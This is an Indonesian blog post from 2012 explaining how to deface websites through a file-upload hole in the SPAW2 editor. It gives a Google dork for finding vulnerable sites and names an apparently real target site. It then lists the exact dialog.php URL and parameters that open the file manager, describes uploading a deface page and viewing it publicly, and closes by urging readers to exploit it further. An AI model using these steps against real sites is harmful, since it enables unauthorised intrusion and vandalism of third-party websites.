Rabu, 04 April 2012

Spaw2 Upload Vulnerability

google dork : inurl:"spaw2/uploads/files/"

setelah mencari kesana kemari misalnya kita udah dpt target..

example :



Code:
http://www.linx-lmn.ro

gimana lagi nih? okeh..

ganti spaw2/uploads/files/Solar_modules/HS-122st.pdf dengan spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

sehingga menjadi http://www.linx-lmn.ro/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

hmm gimana buat upload file deface kita? begini

klik pilihan "images" menjadi "files"

setelah selesai klik browse lalu upload..

kalo udah di upload gimana lagi supaya muncul hasil deface kita?

lihat bagian kanan.. klik [download files] tapi lihat dulu nama file yg kita masukan apa. setelah selesai maka akan menjadi seperti ini
http://www.linx-lmn.ro/spaw2/uploads/files/bubud007.html


silahkan di explorisasi dari deface upload ini

Tidak ada komentar:

Posting Komentar